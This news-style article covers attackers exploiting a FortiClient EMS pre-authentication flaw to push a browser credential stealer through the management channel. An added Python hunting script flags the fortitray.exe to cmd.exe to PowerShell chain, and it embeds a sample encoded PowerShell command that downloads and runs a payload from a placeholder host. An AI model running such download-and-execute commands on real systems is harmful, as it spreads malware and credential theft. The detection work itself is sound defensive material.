FortiClient EMS Flaw Exploited by Attackers to Spread Credential-Stealing Malware

Critical FortiClient EMS Vulnerability Exploited to Deploy Credential-Stealing Malware

In May 2026, cybersecurity firm Arctic Wolf identified a sophisticated cyberattack targeting FortiClient Endpoint Management Server (EMS) deployments. Threat actors exploited a critical vulnerability, designated as CVE-2026-35616 with a CVSS score of 9.1, to distribute credential-stealing malware across managed endpoints. This flaw, a pre-authentication API access bypass leading to privilege escalation, was addressed by Fortinet in FortiClient EMS version 7.4.7 and later.

Exploitation Methodology

The attackers infiltrated the EMS by exploiting CVE-2026-35616, allowing them to gain unauthorized access and escalate privileges. Once inside, they manipulated the EMS configurations to delay firmware upgrade notifications and altered Remote Access Profile settings. This manipulation enabled the insertion of malicious scripts into endpoint policies, which were then executed on the managed devices.

Arctic Wolf’s analysis revealed that the adversaries used FortiClient’s own management channel to push PowerShell commands that looked like legitimate administrative operations. Because the EMS already holds a trusted relationship with every enrolled device, this approach let the attackers execute malicious scripts across all managed endpoints without needing a separate intrusion method for each one.

Malware Deployment and Execution

The attack leveraged fortitray.exe, a legitimate FortiClient executable, to initiate a .cmd script via cmd.exe. This script executed a Base64-encoded PowerShell command designed to download and run a malicious payload. The payload, disguised as FortiEndpoint_Patch.exe, masqueraded as a legitimate update but was, in fact, a previously unidentified Windows information stealer.

This malware harvested sensitive data, including passwords, cookies, and autofill information such as credit card details, addresses, and phone numbers, from Chromium- and Gecko-based browsers. The collected data was written to a log file under the ProgramData directory. Notably, the stealer itself had no network exfiltration capability; instead, the PowerShell script transmitted the harvested data to an attacker-controlled server at 83.138.53[.]110 via an HTTP POST request.
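The execution chain described in the two sections above (fortitray.exe launching a .cmd script through cmd.exe, which in turn runs a Base64-encoded PowerShell command that downloads and starts a payload) is a concrete thing a SOC can hunt for in process-creation telemetry. The following Python is an added example written for this article, not code from Arctic Wolf or Fortinet: it walks Sysmon Event ID 1 style records, reconstructs the parent chain of every powershell.exe, decodes any -EncodedCommand argument (PowerShell expects Base64 over UTF-16LE text), and flags the combination of a fortitray.exe -> cmd.exe -> powershell.exe ancestry with download-and-run cmdlets or a ProgramData path in the decoded command. The sample events, the decoded command text, the update.cmd name and the 203.0.113.10 address are all constructed for the example; only the process names and the FortiEndpoint_Patch.exe filename come from the article.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 / EDR style fields)."""
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # its command line


# Constructed sample of the PowerShell stage a .cmd script might launch.
# This plaintext is an assumption made for the example, not the attacker's
# script; 203.0.113.10 is a documentation-range placeholder address.
_SAMPLE_PS = (
    "Invoke-WebRequest -Uri http://203.0.113.10/FortiEndpoint_Patch.exe "
    "-OutFile C:\\ProgramData\\FortiEndpoint_Patch.exe; "
    "Start-Process C:\\ProgramData\\FortiEndpoint_Patch.exe"
)
# -EncodedCommand takes Base64 of the UTF-16LE encoding of the command text.
_SAMPLE_ENC = base64.b64encode(_SAMPLE_PS.encode("utf-16-le")).decode("ascii")

# Constructed telemetry: one malicious chain plus benign noise that must not fire.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(900, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(4100, 900, r"C:\Program Files\Fortinet\FortiClient\fortitray.exe", "fortitray.exe"),
    ProcEvent(4212, 4100, r"C:\Windows\System32\cmd.exe", r'cmd.exe /c "C:\ProgramData\update.cmd"'),
    ProcEvent(4300, 4212, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -NoProfile -EncodedCommand {_SAMPLE_ENC}"),
    ProcEvent(5000, 900, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcEvent(5100, 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -Command Get-Date"),
]

# Accepts the long flag and the abbreviations PowerShell resolves (-enc, -ec, -e).
_ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Cmdlets and paths worth flagging inside a decoded command.
_DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest|DownloadString|DownloadFile|Invoke-Expression|\biex\b|Start-Process",
    re.IGNORECASE,
)
_PROGRAMDATA_RE = re.compile(r"ProgramData", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand text, or None if absent or malformed."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(by_pid: Dict[int, ProcEvent], pid: int, max_depth: int = 10) -> List[str]:
    """Image basenames from the process up to its oldest known ancestor."""
    chain: List[str] = []
    seen = set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen and len(chain) < max_depth:
        seen.add(cur.pid)
        chain.append(_basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return chain


def find_suspicious(events: List[ProcEvent]) -> List[dict]:
    """Flag powershell.exe launched via fortitray.exe -> cmd.exe with a risky encoded command."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if _basename(e.image) != "powershell.exe":
            continue
        chain = ancestry(by_pid, e.pid)
        tray_chain = chain[:3] == ["powershell.exe", "cmd.exe", "fortitray.exe"]
        decoded = decode_encoded_command(e.cmdline)
        indicators = []
        if tray_chain:
            indicators.append("spawned via fortitray.exe -> cmd.exe")
        if decoded is not None:
            indicators.append("encoded command")
            if _DOWNLOAD_RE.search(decoded):
                indicators.append("download/execute cmdlet in decoded command")
            if _PROGRAMDATA_RE.search(decoded):
                indicators.append("references ProgramData")
        # Require the parent chain plus at least one content indicator to limit noise.
        if tray_chain and len(indicators) >= 2:
            hits.append({"pid": e.pid, "chain": chain, "decoded": decoded, "indicators": indicators})
    return hits


if __name__ == "__main__":
    for h in find_suspicious(SAMPLE_EVENTS):
        print(h["pid"], " <- ".join(h["chain"]))
        for ind in h["indicators"]:
            print("  -", ind)
        print("  decoded:", h["decoded"])
```

The rule keys on the parent chain rather than on the payload filename, so a renamed executable or a different download URL still fires; the decoded-command indicators are what separate the malicious chain from FortiClient's own routine use of PowerShell. In production the same logic maps directly onto a Sysmon or EDR query that joins ParentProcessId to ProcessId.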

Implications and Recommendations

By bypassing API authentication and interacting with EMS functions in a privileged context, the attackers were able to modify management configurations and push malicious scripts for execution on managed endpoints. In effect, they turned trusted infrastructure into a distribution mechanism, making the EMS a conduit for widespread infection.

The stolen session cookies and saved browser credentials could grant attackers further access to cloud services, internal applications, and other authenticated resources. In some cases, session reuse might circumvent multi-factor authentication (MFA) prompts, posing significant security risks.

Organizations utilizing FortiClient EMS are strongly advised to upgrade to version 7.4.7 or later to mitigate this vulnerability. Additionally, implementing robust monitoring of EMS configurations and endpoint activities can help detect and prevent unauthorized modifications. Regularly reviewing and updating security protocols, along with educating staff on potential phishing tactics, can further enhance an organization’s defense against such sophisticated attacks.